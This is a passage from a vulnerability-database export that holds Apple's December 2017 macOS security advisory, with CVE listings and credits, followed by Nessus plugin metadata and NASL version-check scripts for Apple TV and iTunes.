Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: July 27, 2020\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-12837", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-13886", "CVE-2017-13887", "CVE-2017-13892", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798"], "modified": "2017-12-06T00:00:00", "id": "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "href": "https://support.apple.com/kb/HT208331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:37:17", "description": "According to its banner, the version of Apple TV on the remote device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "nessus", "title": "Apple TV < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13833", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162"], "modified": "2019-06-04T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105612", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105612);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\n \"CVE-2017-7154\",\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-7162\",\n \"CVE-2017-13833\",\n \"CVE-2017-13855\",\n \"CVE-2017-13856\",\n \"CVE-2017-13861\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13866\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13870\",\n \"CVE-2017-13876\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-6-4\");\n\n script_name(english:\"Apple TV < 11.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208327\");\n # https://seclists.org/fulldisclosure/2017/Dec/29\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?262ee1b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.2 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15K106\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_WARNING\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-30T14:46:54", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2022-11-30T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_112_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/105075", "sourceData": "Binary data apple_ios_112_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:51", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities (APPLE-SA-2017-12-13-6)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-7152", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700544.PRM", "href": "https://www.tenable.com/plugins/nnm/700544", "sourceData": "Binary data 700544.prm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:49", "description": "The version of Apple Safari installed on the remote host is prior to 11.0.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208324 security advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 11.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700501.PRM", "href": "https://www.tenable.com/plugins/nnm/700501", "sourceData": "Binary data 700501.prm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:37:18", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.2. It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/105652", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105652);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181, 102192);\n\n script_name(english:\"Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.2. It is, therefore, affected by multiple vulnerabilities\nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, 